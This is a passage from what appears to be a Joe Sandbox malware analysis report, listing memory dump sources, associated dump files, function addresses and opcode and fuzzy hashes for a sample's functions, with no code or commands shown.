                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                                                • Instruction ID: 8265e149646acc40f3a5ebadb97ac08374050fe5eb679da1920736226e7e2b57
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3011A332A051E40AD3269D3C85405A5BFE30AD7634B1A43DAE4B89B2D2D63ACDCAD359
                                                                                                                                                                                                                                                                Function 004373B4 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 668fc4a714a9d845bbe5e172f209025e8fb22ffe748a9981092b53b93b18c6a6
                                                                                                                                                                                                                                                                • Instruction ID: 809649a53aba9a5b601de178f74f21fd29d601ada092f5b9d5182d1b1152518f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 668fc4a714a9d845bbe5e172f209025e8fb22ffe748a9981092b53b93b18c6a6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 371151B3F5652587F394447ACD18762A9539BD1304F1B8175C64C6BADAC87C4C0EA284
                                                                                                                                                                                                                                                                Function 003FC300 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: d915abd692c596d351a76ef7c44155bf2f7634e88133afcabaf1f94f6f3ee80c
                                                                                                                                                                                                                                                                • Instruction ID: 0538ff62511da1997a1287c725e5b783f55f9f4e7a2a23ae17cd607d61d1c015
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d915abd692c596d351a76ef7c44155bf2f7634e88133afcabaf1f94f6f3ee80c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CAF08160114B914AD7328F398520773BFE09B13218F142A4DC6D347AD2D36AD00A8784
                                                                                                                                                                                                                                                                Function 0040E0DA Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: a74d5857912f424093c70e21deeb6922a10a882864307659604c18145d6e58bc
                                                                                                                                                                                                                                                                • Instruction ID: 8700be3259b3a4a1a23fa304d73b14afff78cfd41d9313efe75c686f3533b06c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a74d5857912f424093c70e21deeb6922a10a882864307659604c18145d6e58bc
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4FF06C104087E246D723473E44506B3AFD09B57120B141FD6C8E1AB7C7C3299497D35A
                                                                                                                                                                                                                                                                Function 0040D116 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 5942bd499fb4065e238f13ce8f337e931f9b282e7074cf315b73fdaade49b93d
                                                                                                                                                                                                                                                                • Instruction ID: 4faf5696e314d919df301803cfefa09752727b8c99f04b46b902a9172314b44b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5942bd499fb4065e238f13ce8f337e931f9b282e7074cf315b73fdaade49b93d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DE01F9706442829BD314CF38CCA056BFBA1FB96364F08C79DC4568B796C638D443C799